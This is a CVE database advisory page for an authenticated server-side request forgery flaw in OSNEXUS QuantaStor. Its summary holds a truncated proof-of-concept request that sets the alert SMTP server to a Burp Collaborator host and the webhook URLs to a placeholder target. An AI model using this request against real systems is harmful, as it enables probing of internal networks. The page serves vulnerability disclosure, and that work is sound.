cvedb.io
CVE-2021-42079
MEDIUM · CVSS 6.2
EPSS exploitation probability: 0%
Published 2023-07-10T16:15:47.467 · Last modified 2026-06-17T04:09:16.550

Summary

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5

Affected products

osnexus — quantastor

Does this affect you?

Add your gear to cvedb and we'll alert you only when osnexus ships something exploited.

Check my exposure →

References

This product uses data from the NVD API but is not endorsed or certified by the NVD. Informational only; not professional security advice.